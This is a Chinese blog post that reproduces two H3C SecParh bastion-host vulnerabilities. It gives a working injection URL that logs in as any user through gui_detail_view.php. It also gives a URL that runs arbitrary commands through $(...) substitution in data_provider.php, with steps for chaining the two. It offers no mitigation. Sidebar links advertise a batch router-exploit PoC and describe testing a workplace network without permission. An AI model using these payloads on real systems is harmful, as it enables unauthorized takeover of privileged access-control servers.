H3C SecParh堡垒机任意用户登录与远程执行代码漏洞

最新推荐文章于 2024-05-16 17:12:22 发布
最新推荐文章于 2024-05-16 17:12:22 发布
阅读量3.3k 收藏
点赞数
分类专栏: 网络安全学习 # 漏洞复现 文章标签: php 安全 web安全 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44268918/article/details/128848888
版权

H3C SecParh堡垒机任意用户登录与远程执行代码漏洞

1.H3C SecParh堡垒机任意用户登录漏洞

1.1.漏洞描述

  在H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞。

1.2.漏洞影响

  H3C SecParh堡垒机

1.3.漏洞复现

1.3.1.登录页面

  该漏洞版本的登录页面如下,2018年的。
在这里插入图片描述

1.3.2.构建URL

URL:https://IP地址:端口//audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin

在这里插入图片描述

1.4.总结

  这里确实成功登录上去了,若设定三权的话,可能存在把admin用户设定为类似与这里的审计管理员,那么就需要测试是否能够跳转到操作管理员或者其它的一些管理员账号上去。这里就不再深入测试,只是提供一个思路。

2.H3C SecParh堡垒机远程命令执行漏洞

2.1.漏洞描述

  H3C SecParh堡垒机data_provider.php存在远程命令执行漏洞,攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令。

2.2.漏洞影响

  H3C SecParh堡垒机

2.3.漏洞复现

2.3.1.登录页面

  该漏洞版本的登录页面如下,2018年的。
在这里插入图片描述

2.3.2.构建URL

URL:https://IP地址:端口/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(pwd)&identity_cond=&query_type=all&format=json&browse=true

  需要注意一定要通过先通过任意用户登录获取Cookie,然后在URL中service后面的括号中输入想要执行的命令,即可实现远程命令执行。
在这里插入图片描述

2.4.总结

  我使用火狐浏览器,我访问后就自动将信息进行下载,不过也有浏览器直接跳转界面的也行,都能够看到。

剁椒鱼头没剁椒
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
H3C任意命令执行漏洞
战神/calmness的博客
05-23 9219
H3C漏洞 目录 简述 过程 修复建议 参考链接 简述 H3C iMC智能管理中心 云计算(cloud computing):“云计算是一种计算模式,利用互联网技术把大量可扩展和弹性的IT相关能力作为一种服务提供给多个用户(Gartner)”。提供资源的网络被称为“云”。“云”中的资源在使用者看来是可以无限扩展的,并且可以随时获取,按需使用,随时扩展,这使得应用提供者无需为繁琐的细节而烦恼,能够更加专注于自己的业务,有利于创新和降低成本。 过程 body="iMC来宾接入自助管理..
关于H3C路由器漏洞的情况说明
weixin_44106034的博客
10-19 2335
ER3108G-CN,ER3108GW-CN,ER2100-CN,ER2100V2,ER2100n,ER2210C-CN,ER3100-CN,ER3260-CN,ER5100-CN,ER5200-CN,ER6300-CN,ER8300-CN,ER3200-CN已停止维护。H3C MC101/MC102/MC500/H100/H100-EI/H200/H200-EI、H3C X3路由器、H3C Magic R1/R100/B1/B0/B3/M2都已经停止维护。
H3C多系列路由器存在前台RCE漏洞(含批量验证poc)
最新发布
2401_84264583的博客
05-16 325
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。(1)payload利用地址:/goform/aspForm。H3C多系列路由器存在前台RCE漏洞。因篇幅有限,仅展示部分资料。
H3C ER G2系列路由器敏感信息泄露漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
09-20 1853
H3C ER2200G2是H3C推出的新一代高性能企业级路由器,采用全新硬件架构、具备丰富的软件功能、支持全面的安全策略。定位于以太网/光纤/xDSL接入的中小商业市场(SMB),可部署于需要高速Internet接入的政府机构、中小企业、餐饮连锁、酒店、学校、医院、网吧等网络环境。H3C ER G2系列版本存在敏感信息泄露漏洞。攻击者通过actionpolicy_status跳转别的接口,利用该漏洞访问ER2200G2.cfg文件。
H3C iMC 存在远程命令执行漏洞
nnn2188185的博客
04-22 3294
H3C Intelligent Management Center(以下简称 H3C iMC)是一款业务智能管理平台。 H3C Intelligent Management Center 存在命令执行漏洞。攻击者可利用漏洞通过构造特殊的请求造成远程命令执行
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 642
任务环境说明:服务器场景:Server1。
H3C SecParh堡垒机 data_provider.php 远程命令执行漏洞
10-22 476
道虽远,行则易至;儒虽难,坚为易成
H3C交换机设置WEB登录基础配置实操案例.docx
06-12
H3C交换机设置WEB登录基础配置实操案例 以下是根据给定文件信息生成的相关知识点: 一、H3C交换机WEB登录基础配置概述 H3C交换机WEB登录基础配置是指在H3C交换机上实现WEB登录功能的基础配置,包括创建本地用户、...
H3C_TELNET登录管理基础配置案例
04-13
H3C_TELNET登录管理基础配置案例】 在IT网络管理中,远程访问设备是常见操作,H3C的设备提供了通过TELNET协议进行管理的功能。本案例将详细介绍如何在H3C V7版本的网络设备(如交换机、路由器)上配置TELNET登录...
华三H3C Cloud Lab云实验室用户手册.zip
08-28
华三云实验室(H3C Cloud Lab,简称HCL)是一款界面图形化的全真网络模拟软件,用户可以通过该软件实现H3C公司多个型号的虚拟设备的组网,是用户学习、测试基于H3C公司Comware V7平台的网络设备的必备工具。
H3C企业路由器(ER、ERG2、GR系列)任意用户登录.md
07-09
H3C企业路由器(ER、ERG2、GR系列)任意用户登录
堡垒机运维人员使用手册
01-19
启明堡垒机运维人员使用手册本手册详细介绍了天玥 OSM 进行运维操作过程的使用方法,用户可参考本手册,通过天 玥 OSM 进行各种运维操作
思科和H3C交换机登录配置统一简易操作手册.doc
12-04
本文档主要介绍了思科和H3C交换机的登录配置操作手册,旨在帮助用户快速掌握交换机的登录配置过程。下面是从文档中提取的相关知识点: 1. 交换机CONSOLE口的作用:CONSOLE口是交换机专门用于配置和管理的端口,可以...
堡垒机SQL注入漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
09-06 695
中远麒麟堡垒机能够提供细粒度的访问控制,最大限度保护用户资源的安全。麒麟堡垒机存在SQL注入漏洞漏洞漏洞等级高危漏洞影响中远麒麟堡垒机FOFA。
H3C SecParh堡垒机任意用户登录
LiBai'S BLOG
12-29 6749
漏洞描述: H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞 与齐治堡垒机出现的漏洞相似 漏洞复现: POC: /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin ...
H3C堡垒机批量纳管H3C设备或者Linux设备(其他厂商见下述支持列表)
weixin_43089784的博客
03-30 1412
#! /usr/bin/env python # -*- coding:utf-8 -*- # Author:Zheng import requests import sys import json import urllib3 import asyncio import netdev import paramiko import threading import subprocess import IPy urllib3.disable_warnings() class H3C_Jumpserv..
利用H3C ER5100权限绕过漏洞***内网
weixin_34082695的博客
04-05 2786
昨天在老婆单位门口等老婆下班回家。在车里没事,决定给老婆单位做一个免费的***测试服务。因为老婆在某豪华车4S店工作,她们单位的WiFi信号隔着一条马路还是满格。虽然用的是WPA/WPA2加密。使用Aircrack-ng直接截获密码文件,上传到我用树莓派搭建的“24小时开机大数据社工库暨超牛逼彩虹表破解平台”用了不到十分钟就跑了出来,8位纯数字,我只能说呵呵。跟老婆打电话,...
H3C GB0-551 .docx
03-03
H3C GB0-551 .docx

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

剁椒鱼头没剁椒

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值